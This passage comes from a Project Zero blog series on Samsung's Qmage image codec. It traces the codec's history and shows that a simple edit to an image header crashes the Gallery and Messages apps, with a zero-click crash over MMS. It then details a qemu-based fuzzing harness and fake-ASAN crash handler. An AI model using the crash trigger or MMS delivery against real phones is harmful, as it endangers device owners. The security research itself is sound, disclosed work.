The animations are displayed by the /system/bin/bootanimation system executable, which in turn uses a dedicated libQmageDecoder.so library (currently at around ~600 kB) for parsing the files. On a high level, the libQmageDecoder interfaces are similar to Skia's, but the inner workings start to differ deeper down the call stack. A general overview of the header parsing control flow is shown below:

QmageDecParseHeader
└── QmageDecCommon_ParseHeader
    ├── QmageDecCommon_QmageAudioVersionCheck
    ├── QmageDecCommon_QGetDecoderInfo
    ├── QmageDecCommon_VGetDecoderInfo
    └── QmageDecCommon_WGetDecoderInfo

Within these functions, the following file signatures are being checked for: AUQM, NQ, QM, PFR, IM, IFEG, IT, QW. We have already seen most of them in Skia, but the first two on the list are completely new. This goes to show the depth of Quramsoft's portfolio in terms of the variety of invented file formats.

Furthermore, here is a simplified outline of the frame decoding process and the involved functions in the current libQmageDecoder.so on Android 10:

QmageDecodeAniFrame
├── checkDecodeQueue
│   └── QphotoThreadManager::checkDecodeQueue
│       └── QphotoThreadPool::run
│           └── QmageJob::run
│               └── Qmage_WDecodeAniFrameThreadJob_Low
│                   └── Qmage_WDecodeFrame_Low
│                       └── _QM_WCodec_decode
│                           ├── PVcodecDecoderIndex
│                           ├── PVcodecDecoderGrayScale
│                           └── PVcodecDecoder
└── Qmage_VDecodeAniFrame_Low
    ├── Qmage_VDecodeFrame_Low
    │   ├── _QM_DecodeOneFrame_A9LL_TINY
    │   ├── _QM_DecodeOneFrame_A9LL
    │   └── _QM_DecodeOneFrame_A9LL_alpha
    ├── _QM_DecodeOneFrame_A9LL_ani_LineSkip
    ├── _QM_DecodeOneFrame_A9LL_ani
    └── _QM_DecodeOneFrame_A9LL_ani_alpha

There are a number of previously unknown routines here under the Qmage_VDecode path, but there is also a very familiar subtree starting at Qmage_WDecodeFrame_Low, which we've already seen in Skia. But why is it even important, considering that boot animations are not really an attack surface? That's because the libQmageDecoder.so module in Samsung phones shipped with debug symbols for a long time – starting in mid-2010 with Android 2.1 (Eclair), up to various Samsung Android 4.3 firmwares published in 2013. During that time frame, the ELF file included not just function names, but also source file names and line numbers, full structure layouts, enum names, local variable names etc. It is a goldmine of useful information about the evolution of the codec during these years, and includes many details of the inner workings that still apply to this day.

For example, if we take libQmageDecoder.so from a Galaxy S Duos (Android 4.0.4, Jan 2013 build), we can use readelf and objdump to determine that:

  • The library compilation directory was /home2/cheus/Froyo/Froyo22_Qmage
  • It consisted of the following source files:
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.c, 1547 lines of code
    • external/Qmage/QmageDecoderLIB/src/QmageDecoder.c, 219 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_FDecoder_Low.c, 74 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_VDecoder_Low.c, 3954 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_WDecoder_Low.c, 5458 LOC
    • external/Qmage/QmageInterface/QmageInterface.c, 113 LOC
  • and the following headers:
    • external/Qmage/QmageDecoderLIB/src/QmageDecType.h
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.h

We get access to some very helpful structures:

(gdb) ptype Qmage_DecderLowInfo
type = struct {
    QM_BOOL Ver200_SPEED;
    QM_BOOL IS_ANIMATION;
    QM_BOOL UseExtraException;
    QM_BOOL tiny;
    QM_BOOL IsDyanmicTable;
    QM_BOOL IsOpaque;
    QM_BOOL NearLossless;
    QMINT32 SIZE_SHIFT;
    QMINT32 ANI_RANGE;
    QMINT32 qp;
    QMINT32 mode_bit;
    QMINT32 header_len;
    QM_BOOL NotComp;
    QM_BOOL NotAlphaComp;
    QMINT32 alpha_decode_flag;
    QMINT32 depth;
    QMINT32 alpha_depth;
    Qmage_VDecoderVMODE_T mode;
    Qmage_V_DecoderVersion vversion;
    Qmage_F_DecoderVersion fversion;
    Qmage_DecoderVersion qversion;
    QmageDecodeCodecType rgb_encoder_mode;
    QmageDecodeCodecType alpha_encoder_mode;
    QmageRawImageType out_type;
}
(gdb)

and equally interesting enums:

(gdb) ptype QmageDecodeCodecType
type = enum {QMAGE_DEC_V16_SHORT_INDEX, QMAGE_DEC_W2_PASS, QMAGE_DEC_V16_BYTE_INDEX, QMAGE_DEC_W1_PASS, QMAGE_DEC_FCODEC, QMAGE_DEC_W1_PASS_FROM_W_ADAPTIVE, QMAGE_DEC_V24_SHORT_INDEX, QMAGE_DEC_W2_PASS_ONLY, QMAGE_DEC_PV, QMAGE_DEC_SLV, QMAGE_DEC_QV}
(gdb)

not to mention some very clean decompiler output:

Hex-Rays decompilation output

It was only after finding this extended debug metadata that I started to understand how parts of the codec actually worked. I would highly recommend referring to these symbols if you are planning to perform any Qmage-related research; many of them can even be cleanly ported to a modern Skia disassembly database.

During a similar time frame around 2010, Samsung was also still producing non-Android mobile phones, which also have traces of Qmage in their underlying custom OS. Two examples of such devices are Samsung GT-B5722 (released in 2009) and Samsung GT-C5010 Squash (released in 2010):

Official Samsung product photos

Their firmware was again compiled with debug data built in, with many references to Qmage too. Let's take a look at the B5722 firmware – it contains a B5722_Master.x file which is a fairly regular ARM ELF executable, so we can load it in gdb-multiarch or IDA Pro and browse around or dump some types. As an example, we can find our favorite Qmage_WDecodeFrame_Low function, and explore its callers and callees in the function call graph:

lkres_IFEGBodyDecode
├── QmageDecodeAniFrame
│   └── Qmage_VDecodeAniFrame_Low
│       ├── Qmage_VDecodeFrame_Low
│       │   ├── _QM_DecodeOneFrame_A9LL_TINY
│       │   ├── _QM_DecodeOneFrame_A9LL
│       │   └── _QM_DecodeOneFrame_A9LL_alpha
│       ├── _QM_DecodeOneFrame_A9LL_ani
│       └── _QM_DecodeOneFrame_A9LL_ani_alpha
├── QmageDecodeFrame
│   ├── Qmage_VDecodeFrame_Low
│   ├── Qmage_FDecodeFrame_Low
│   └── Qmage_WDecodeFrame_Low
│       └── _QM_WCodec_decode
│           ├── _QM1st_decode
│           └── _QM_WCodec_2nd_decode
└── IFEGDecodeFrame
    ├── IFEGDecodeFrame_DCT
    ├── IFEGDecodeFrame_Pad
    └── IFEGDecodeFrame_NoPad

In the above tree, we can recognize the "V" codec and the subtree responsible for processing animations, and the "W" codec handling static bitmaps, but there is also a whole new branch of code related to the decoding of IFEG. As you may remember from earlier in this post, this was one of the left-over magic values looked for by QmageDecCommon_VersionCheck_Rev8253_140615 in modern Skia – now we can see the format was actually used 10+ years ago. Additionally, all three of these code paths have a common ancestor in the lkres_IFEGBodyDecode function, which shows even more clearly that the IFEG and Qmage formats are closely related, with the former likely being some form of a predecessor of the latter. We can also verify that GT-B5722's embedded resources were encoded in both formats, by inspecting the B5722_Master.cfg file which enumerates the contents of the B5722_Master.tfs binary blob:

FILE_NAME : /a/images/13_pictbridge_pictbridge_top.ifg
FILE_SIZE : 6908
FILE_NAME : /a/images/13_pictbridge_pictbridge_top_hui.ifg
FILE_SIZE : 4766
FILE_NAME : /a/images/13_pictbridge_progress_bg.ifg
FILE_SIZE : 1304
FILE_NAME : /a/images/13_pictbridge_progress_bg_hui.ifg
FILE_SIZE : 594
FILE_NAME : /a/images/13_pictbridge_sending_ani01.ifg
[...]
FILE_NAME : /a/multimedia/imgapp/imgapp_default_image.qmg
FILE_SIZE : 39128
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail.qmg
FILE_SIZE : 800
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail_focus.qmg
FILE_SIZE : 1152
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit.qmg
FILE_SIZE : 1340
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit_focus.qmg

Based on this, we now know that Qmage files (in some shape) made their first appearance in Samsung devices around 2009-2010. But what about IFEG, and for how long has Samsung been shipping Quramsoft decoders? To answer that question, I delved into even older builds of the firmware and tried to bisect the debut of the custom codecs. The first ever phone that I have confirmed to use the IFEG format is Samsung SGH-D600, which launched in 2005. Almost all of its resources are encoded as .ifg files, and the software itself contains a number of relevant strings such as lk_ifegDecode, IFEGGetVersion, IFEGGetImageSize, IFEGDecodeFrame etc. This seems in line with Quramsoft's own declaration that their collaboration with Samsung started around June 2005. 

To make the story even more complex, the vendor was not even called "Quram" at the time; it was known under the name "I-master". Even though the switch to the current name took place in 2007, artifacts such as symbol names containing "Imaster" or "IM" could be found in Samsung's libraries for a few more years, e.g. Imaster_Malloc, ImasterVDecoder_ParseHeader, ImasterVDecErr_FAIL, IM_DecodeOneFrame_A9LL, etc. This could explain the meaning of the obsolete "IM" file signature mentioned earlier in this post, which I have seen used only once – as the container for boot animations on the very first Samsung phone running Android, Samsung GT-I7500 Galaxy released in 2009. What a ride! :)

To gather all this information in one place, I have compiled the following timeline showing the development of all Quramsoft image codecs I have observed shipping in Samsung devices over the years. While the presented data is based on my examination of dozens of firmwares, the Android ecosystem is a vastly complex one and involves thousands of software builds, so I make no promises as to the accuracy of the analysis below. If you spot any errors or inconsistencies that you can correct, please reach out and I will be happy to update this post.

Timeline of Quramsoft image codecs found on Samsung devices

As we can see, while Qmage has "only" been natively supported on Samsung Android since late 2014, the history of collaboration between Samsung and Quramsoft has lasted much longer. Reverse engineering these older binaries provided me with a lot of interesting insights, and pragmatically useful information such as the debug symbols from non-stripped executables. The extra context proved valuable later in the project and quite honestly, it also satisfied my curiosity, which is an important part. :)

Initial pokes at the codec

With all this historical background behind us, it's time to see how the codec can be broken today, or rather could be broken before the May 2020 update. Let's go back to the original accessibility_light_easy_off.qmg sample we extracted before. We can open it in a hex editor again, and to start with a simple test, consider which parts are most likely to cause problems when corrupted. For bitmaps, the obvious candidates are the dimensions, so I modified the width and height just slightly (344 → 345) and tried to open it in Gallery on a system with the February 2020 patch level:

Failed attempt to display a corrupted Qmage file in Gallery

It wouldn't load anymore. It's worth noting that the Qmage codec is packed with __android_log_print calls, so we can grep for them with logcat to get some more information on what happened:

d2s:/ $ logcat -v tag | egrep "QG|Qmage"
E/QG      : Qmage decoder error return value -298
E/Qmage   : Qmage QuramQmageDecodeFrame offset <= 0, offset: -298

These log messages tend to be helpful from time to time, so it's worth keeping them in mind. With such a small change in the file, nothing bad seems to have happened, beyond a rightful error being thrown by the codec. What if we increase the dimensions even more, let's say from 0x158 (344) each to 0x558 (1368) each?

Bit flips manually applied to the Qmage header

Let's try it:

Gallery app crash notification

The Gallery app instantly crashes. The full context can be extracted with logcat:

130|d2s:/ $ logcat -b crash -v raw
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90 in tid 12442 (thumbThread2), pid 12395 (droid.gallery3d)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS2BTA7:user/release-keys'
Revision: '24'
ABI: 'arm64'
pid: 12395, tid: 12442, name: thumbThread2  >>> com.sec.android.gallery3d <<<
uid: 10125
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90
    x0  0000000000000000  x1  0000000000000558  x2  fffffffffffffaa8  x3  0000000000000011
    x4  000000700ba00700  x5  0000000000000003  x6  0000000000000000  x7  0000000000000016
    x8  0000000000000000  x9  00000000000003d2  x10 0000000000000004  x11 000000701bc85a16
    x12 0000000000000000  x13 000000701bec0c0f  x14 000000700fc4e00d  x15 000000000000000d
    x16 0000000000000018  x17 0000000000000000  x18 000000703a846000  x19 0000000000000305
    x20 000000700b9ffc90  x21 000000700fb32a80  x22 000000700fb8f200  x23 0000000000088926
    x24 000000005650868a  x25 000000701bec0c00  x26 00000000000003d2  x27 0000000000000007
    x28 0000000000000020  x29 000000703ac3e5f0
    sp  000000703ac3e390  lr  000000700ba00740  pc  0000007136b20d18

backtrace:
      #00 pc 00000000002bbd18  /system/lib64/libhwui.so (PVcodecDecoder_GrayScale_16bits_NEW+3636) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #01 pc 000000000029cefc  /system/lib64/libhwui.so (__QM_WCodec_decode+948) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #02 pc 000000000029c9b0  /system/lib64/libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+320) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #03 pc 000000000029ae78  /system/lib64/libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+164) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #04 pc 00000000006e1eec  /system/lib64/libhwui.so (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+1100) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

The fact that such a trivial change to the file header was sufficient to trigger a crash did not bode well for the security of the codec. In my experience, no decently tested image parser would crash on such an obvious inconsistency. Then I remembered that the Samsung Messages app also displayed Qmage files, so I sent the malformed image via MMS to see what would happen. To my disbelief, the exact same crash reproduced again, this time in the com.samsung.android.messaging process, and with no user interaction required:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x702ae96b10 in tid 15454 (pool-5-thread-1), pid 7904 (droid.messaging)
[...]
pid: 7904, tid: 15454, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<

This result had to mean that the Messages app automatically decoded images found in incoming messages, even before the user manually opened them. It was a big moment in my research, one which opened the seemingly fragile attack surface to remote exploitation by only knowing the victim's phone number. At that point, I was convinced that the best course of action was to run a thorough coverage-guided fuzzing session of the codec, and report all identified crashes to the vendor. This became my focus for the next couple of weeks, culminating in documenting my findings and filing Issue #2002 in the PZ bug tracker at the end of January 2020. The fuzzing effort will be the subject of the next blog post in the Qmage series. Stay tuned!

Conclusion

It is remarkable that such an attractive vulnerability research area managed to stay out of the public eye for so long. I expect that this was caused primarily by the closed-source nature of the code, and the fact that the implementation was buried so deep in the image decoding stack that custom OEM code of that extent was simply not expected to be found there. I know I likely wouldn't have found it, if not for my lack of familiarity with Skia on Android, and the desire to learn where the execution of the BitmapFactory interface eventually ended up (coupled with having a Samsung build of libhwui.so at hand). The fact that there are virtually no references or mentions of this technology online certainly didn't help.

In this write-up, I shared the results of the reconnaissance phase I went through shortly after discovering the codec. As is often the case in my line of work, this process involved spelunking in some pretty archaic areas of code for extended periods of time, to become somewhat of an expert in an obscure field that will never again prove useful outside of this project. :-) Still, I am hoping that it was an interesting read for those who, like me, enjoy some software archeology, and that it also makes a good reference guide for anyone who plans to continue working on Qmage security in the future.

It is crucial that the security claims made by vendors are constantly challenged, and that relevant attack surfaces are exposed and documented. When mistakes happen, it is usually at the expense of end-user security and privacy, and rarely at the expense of the vendor itself. This is why it's increasingly important both for vendors to follow best practices for security and software testing, and for the vigilant security community to ensure that the same mistakes aren't made again.

MMS Exploit Part 2: Effective Fuzzing of the Qmage Codec

23 July 2020 at 16:32
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the second of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 1, I discussed how I discovered the "Qmage" image format natively supported on all modern Samsung phones, and how I traced its roots to Android boot animations and even some pre-Android phones. At this stage of the story, we also know that the codec seems very fragile and is likely affected by bugs, and that it constitutes a zero-click remote attack surface via MMS and the default Samsung Messages app. I was at this point of the project in early December 2019. The next logical step was to thoroughly fuzz it – the code was definitely too extensive and complex to approach with a manual audit, especially without access to the original source or expertise of the inner workings of the format. As a big fan of fuzzing, I hoped to be able to run it in accordance with the current state of the art: efficiently (without unnecessary overhead), at scale, with code coverage information, reliable reproducibility and effective deduplication. But how to achieve all this with a codec that is part of Android, accessible only through Skia image API, and precompiled for the ARM/ARM64 architectures only? Read on to find out!

Writing the test harness

The fuzzing harness is usually one of the most critical pieces of a successful fuzzing session, and it was the first thing I started working on. I published the end result of my work as  SkCodecFuzzer on GitHub, and it can be used as a reference while reading this post. My initial goal with the loader was to write a Linux command-line program that could run on physical Android devices, and use the Skia SkCodec interface to load and decode an input image file in exactly the same way (or at least as closely as possible) as the internal Android doDecode function does it. This turned out to be surprisingly easy: if we ignore some largely irrelevant portions of doDecode, such as interactions with the JNI (Java Native Interface), NinePatch related code and scaling, we are left with just a handful of simple method calls. Accordingly, the ProcessImage() function in my harness is less than 100 lines of code. In order to build such an initial version of the loader, I used the Android NDK toolset, included several header files from the Skia source code, and linked it with the libhwui.so library from the target operating system. After copying the executable and an example Qmage file (let's stick with accessibility_light_easy_off.qmg from Part 1) to my test phone, I could test that it worked:

d2s:/data/local/tmp $ ./loader accessibility_light_easy_off.qmg
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
d2s:/data/local/tmp $

It's worth noting that the harness I used for my fuzzing had one extra check, verifying that the input file started with a QM or QG signature. This was necessary to make sure that the coverage-guided fuzzing wouldn't diverge towards other image formats supported by Skia, and only Qmage-related code would remain tested. There is also a slight difference between Android's code and my harness in the specific heap allocation class used (SkBitmap::HeapAllocator vs a selection of possible classes), but that shouldn't matter in any practical way.
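
For illustration, the core decoding sequence really does boil down to a handful of Skia calls. The sketch below is a simplified approximation (not the actual ProcessImage code; error handling details, option parsing and the signature check mentioned above are omitted):

#include <memory>
#include "SkAndroidCodec.h"
#include "SkBitmap.h"
#include "SkCodec.h"
#include "SkData.h"

// Simplified approximation of the decoding path used by the harness.
bool DecodeImage(const char *path) {
  sk_sp<SkData> data = SkData::MakeFromFileName(path);            // read the input file
  std::unique_ptr<SkCodec> codec = SkCodec::MakeFromData(data);   // sniff the image format
  if (!codec) return false;
  std::unique_ptr<SkAndroidCodec> android_codec =
      SkAndroidCodec::MakeFromCodec(std::move(codec));
  if (!android_codec) return false;
  SkImageInfo info = android_codec->getInfo();                    // dimensions, color/alpha types
  SkBitmap bitmap;
  bitmap.setInfo(info);
  SkBitmap::HeapAllocator allocator;                              // plain heap pixel storage
  if (!bitmap.tryAllocPixels(&allocator)) return false;
  // Decode all pixels in one call, like BitmapFactory's doDecode does.
  return android_codec->getAndroidPixels(info, bitmap.getPixels(),
                                         bitmap.rowBytes()) == SkCodec::kSuccess;
}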

Having such a loader run on Android is great, but it doesn't scale very well and my fuzzing tooling is much better on x86 too, so I was very tempted to get it running on the Intel architecture. One solution would be to try and run the same aarch64 ELF in an emulator such as qemu-aarch64. To make this work, we have to make sure that all potential dependencies of the harness are accessible on the host's file system, by pulling the full /system/lib64 directory, the /system/bin/linker64 file, and perhaps further directories such as /apex/com.android.runtime/lib64 from the research phone to our PC. Once we have that, we can try executing the loader under qemu:

~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 qemu-aarch64 ./loader accessibility_light_easy_off.qmg
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
~/SkCodecFuzzer/source$

If $ANDROID_PATH above points to a directory with Android 9 system files, it works! This is great news as it means that there aren't any fundamental blockers to running emulated Android user-mode components on a x86-64 host. With Android 10 system files, there was one minor issue with an abort thrown by libclang_rt.ubsan_standalone-aarch64-android.so:

==31162==Sanitizer CHECK failed: /usr/local/google/buildbot/src/android/llvm-toolchain/toolchain/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:371 ((internal_prctl(0x53564d41, 0, addr, size, (uptr)name) == 0)) != (0) (0, 0)
libc: Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 31162 (qemu-aarch64), pid 31162 (qemu-aarch64)

By looking at the underlying code, it would seem that an UBSAN_OPTIONS=decorate_proc_maps=0 environment variable should fix the problem, but it didn't, and I didn't investigate further. Instead, I swapped the library with its older copy from Android 9, and the harness correctly worked again.

So, we can now run the Qmage codec on a typical Intel workstation, but one question remains – what is the performance? Software emulation such as qemu's is known to introduce visible overhead as compared to native execution speed. Let's quickly compare the run time of the loader on a Samsung device and in qemu, against the accessibility_light_easy_off.qmg sample:

d2s:/data/local/tmp $ time ./loader accessibility_light_easy_off.qmg >/dev/null
    0m00.12s real     0m00.09s user     0m00.03s system
d2s:/data/local/tmp $

and:

~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 time qemu-aarch64 ./loader -d -i accessibility_light_easy_off.qmg >/dev/null
real  0m0.380s
user  0m0.355s
sys   0m0.025s
~/SkCodecFuzzer/source$

Based on this simple test, there seems to be a ~3x slowdown when running in the emulator. This is not great but completely acceptable, especially if we can scale it up to numerous machines, and maybe find some further optimizations along the way.

At this point, we have a very basic harness that just decodes an input image using the same Skia interfaces as Android. Let's see how we can make it better fit for fuzzing.

Improvement #1 – custom ASAN-like crash reports

One problem with the loader running under qemu is how crashes are manifested by default:

libc: Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4089bfc000 in tid 929264 (qemu-aarch64), pid 929264 (qemu-aarch64)

A native SIGSEGV signal is generated in the emulator and caught by the default libc handler. Let's try this again with gdb attached to see where the exception is thrown:

─────────────────────────────────────────────────────────────── code:x86:64
   0x555555fce3ed <code_gen_buffer+7496640> lea    r14, [rbx+0x1]
   0x555555fce3f1 <code_gen_buffer+7496644> shl    r14, 0x8
   0x555555fce3f5 <code_gen_buffer+7496648> sar    r14, 0x8
 → 0x555555fce3f9 <code_gen_buffer+7496652> movzx  r14d, BYTE PTR [r14]
   0x555555fce3fd <code_gen_buffer+7496656> add    rbx, 0x2
   0x555555fce401 <code_gen_buffer+7496660> mov    QWORD PTR [rbp+0xa8], rbx
   0x555555fce408 <code_gen_buffer+7496667> and    r12d, 0xffffff
   0x555555fce40f <code_gen_buffer+7496674> mov    rbx, r12
   0x555555fce412 <code_gen_buffer+7496677> shl    rbx, 0x8
───────────────────────────────────────────────────────────────────── trace
[#0] 0x555555fce3f9 → code_gen_buffer()
[#1] 0x55555563c720 → cpu_exec()
[#2] 0x55555566e528 → cpu_loop()
[#3] 0x5555555f94cd → main()

As we can see, the x86-64 instruction triggering the crash resides in qemu's code generation buffer, and it's hard to trace it to the actual culprit in ARM assembly inside libhwui.so. The native call stack isn't of much help either, as it only shows the qemu internal functions and not the stack frames of the emulated code. Because of all this, working with these raw crashes is incredibly difficult – they are hard to analyze, triage or deduplicate without re-running them on an Android device. There had to be another way to extract accurate information about the emulated ARM CPU context at the time of the crash.

The internal Google fuzzing infrastructure I use for projects like this supports both native crashes (signals) and AddressSanitizer reports. Most importantly, these reports don't have to be 100% identical to legitimate ASAN outputs. They only have to be close enough to be correctly parsed, but they can still contain both fake data (if the specific information is not available in the given context), and some extra sections you don't normally see in ASAN-enabled targets. I have already taken advantage of this behavior a few times in the past, for example in the DrSancov project I published, which aims to convert any closed-source Linux x86(-64) executable into a semi-ASAN/SanitizerCoverage compatible one using the DynamoRIO instrumentation framework. This was my idea here too – if I could register my own signal handler in the harness, it could print out all the relevant context that it has access to within the emulated process, effectively faking an ASAN crash.
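
As a minimal sketch of the idea (a hypothetical, heavily stripped-down stand-in for the real GeneralSignalHandler, with the unwinding, disassembly and register dump parts omitted), such a handler could look as follows:

#include <signal.h>
#include <stdio.h>
#include <ucontext.h>
#include <unistd.h>

static void FakeAsanHandler(int sig, siginfo_t *info, void *raw_ctx) {
  ucontext_t *ctx = (ucontext_t *)raw_ctx;
#if defined(__aarch64__)
  unsigned long long pc = ctx->uc_mcontext.pc;   // guest registers, as seen under qemu-user
  unsigned long long sp = ctx->uc_mcontext.sp;
#else
  unsigned long long pc = 0, sp = 0;
#endif
  printf("ASAN:SIGSEGV\n");
  printf("=================================================================\n");
  printf("==%d==ERROR: AddressSanitizer: SEGV on unknown address %p (pc 0x%llx sp 0x%llx)\n",
         getpid(), info->si_addr, pc, sp);
  // ...walk the stack, disassemble around pc, dump the full register context...
  printf("==%d==ABORTING\n", getpid());
  _exit(1);
}

void InstallFakeAsanHandler() {
  struct sigaction sa = {};
  sa.sa_sigaction = FakeAsanHandler;
  sa.sa_flags = SA_SIGINFO;
  sigaction(SIGSEGV, &sa, nullptr);              // catch the crash inside the emulated process
}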

The end result is the GeneralSignalHandler function and other unwinding and symbol-related helper routines, which are able to generate pretty crash reports such as the following one:

ASAN:SIGSEGV
=================================================================
==936966==ERROR: AddressSanitizer: SEGV on unknown address 0x408a0e1000 (pc 0x4006605174 sp 0x4000d0adc0 bp 0x4000d0adc0 T0)
    #0 0x002bd174 in libhwui.so (PVcodecDecoder_GrayScale_16bits_NEW+0x2290)
    #1 0x0029cf00 in libhwui.so (__QM_WCodec_decode+0x3b8)
    #2 0x0029c9b4 in libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
    #4 0x006e1ef0 in libhwui.so (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+0x450)
    #5 0x004daf00 in libhwui.so (SkCodec::getPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const*)+0x358)
    #6 0x006e278c in libhwui.so (SkQmgAdapterCodec::onGetAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const&)+0xac)
    #7 0x004da498 in libhwui.so (SkAndroidCodec::getAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const*)+0x2b0)
    #8 0x0004a9a0 in loader (ProcessImage()+0x55c)
    #9 0x0004ac60 in loader (main+0x6c)
    #10 0x0007e858 in libc.so (__libc_init+0x70)

==936966==DISASSEMBLY
    0x4006605174: ldrb        w9, [x13, #1]
    0x4006605178: add         x13, x13, #2
    0x400660517c: bfi         w9, w2, #8, #0x18
    0x4006605180: stur        w9, [x29, #-0xf8]
    0x4006605184: ldur        w19, [x29, #-0xf4]
    0x4006605188: cbz         x8, #0x40066051fc
    0x400660518c: b           #0x4006605250
    0x4006605190: ldr         x9, [sp, #0x110]
    0x4006605194: orr         w27, wzr, #7
    0x4006605198: ldrb        w4, [x9, #1]!

==936966==CONTEXT
   x0=fffffffffffffaa8  x1=0000000000000558  x2=0000000000000000  x3=0000000000000014
   x4=0000004089d33670  x5=0000000000000003  x6=0000000000000003  x7=0000000000000011
   x8=0000000000000004  x9=0000000000000000 x10=0000000000000004 x11=000000408a0e2f8f
  x12=0000000000000000 x13=000000408a0e0fff x14=000000408a0deffc x15=000000000000001f
  x16=0000000000000018 x17=0000000000000000 x18=00000040013f4000 x19=000000000000005b
  x20=0000000000007000 x21=000000408a0c6f55 x22=000000408a0c4eaa x23=0000000000000000
  x24=0000000095100000 x25=000000408a0e0764 x26=0000000000000005 x27=0000000000000007
  x28=0000000000000128  FP=0000004000d0b020  LR=0000004089d338c0  SP=0000004000d0adc0

==936966==ABORTING

The first section of the report is essential for automation, as it includes the type of the signal and stack trace used for deduplication. The disassembly and register values are supplementary and mostly useful in triage, to quickly determine what kind of crash we are dealing with.

The extra functionality comes at the cost of slightly more difficult compilation, as Capstone and libbacktrace need to have their headers included, and static/shared objects linked into the loader. Fortunately this didn't turn out to be too hard, as outlined in SkCodecFuzzer's README. If you run into any issues during the building process with SkCodecFuzzer, please refer to the Issues section as several related problems have been resolved there.

In its current shape, the signal handler also includes a few interesting workarounds to problems I didn't originally anticipate and only stumbled upon them during development and testing:

  • On Android 10, executable code sections (.text etc.) are marked as Execute Only and are thus non-readable (--x access rights). This caused the signal handler to fail when running on a physical Android device, as Capstone would trigger a nested crash while trying to read the instruction bytes for disassembly. I fixed this with an mprotect call to make the memory readable.
  • If the stack is corrupted (e.g. due to a buffer overflow), the stack unwinding code may crash on invalid memory access. Such "double faults" need to be gracefully handled so that the full crash report is always generated correctly. I fixed this with the DoubleFaultHandler and the globals::in_stack_unwinding flag.
  • The abort libc function (called e.g. by __stack_chk_fail) disables the delivery of all signals other than SIGABRT, making it impossible to catch nested exceptions in the stack unwinder. I fixed this with a sigprocmask call (see the short sketch after this list).
  • Crashes occurring at different offsets within standard memory manipulation functions (memcpy, memmove, memset) were wrongly classified as unique, bloating the results and skewing the numbers. I fixed this by detecting these special functions and using their entrypoint addresses in the stack trace, instead of the precise addresses of the faulting instructions.
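
The sigprocmask workaround from the list above is short enough to show in full; a sketch of it (names hypothetical) is simply:

#include <signal.h>

// abort() leaves every signal except SIGABRT blocked, so re-enable SIGSEGV/SIGBUS
// delivery before the (potentially faulting) stack unwinding is attempted.
static void UnblockCrashSignals() {
  sigset_t set;
  sigemptyset(&set);
  sigaddset(&set, SIGSEGV);
  sigaddset(&set, SIGBUS);
  sigprocmask(SIG_UNBLOCK, &set, nullptr);
}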

Improvement #2 – custom low-level allocator (libdislocator)

The custom signal handler is a very useful feature for inspecting and deduplicating crashes, but it helps the most coupled with effective detection of memory safety violations. On Android 9 and 10, Skia uses the default system allocator (jemalloc), which is optimized for performance and not fuzzing. As a result, many tiny out-of-bounds memory accesses may not be detectable at all, as they will just silently fall into the adjacent allocation without corrupting any critical data. In other cases, some bugs may overwrite different adjacent chunks in different test runs due to a non-deterministic heap state, leading to exceptions being thrown further down the line at different locations of the library. All in all, using the default allocator in fuzzing is almost guaranteed to conceal some bugs, and obscure the real root cause of others.

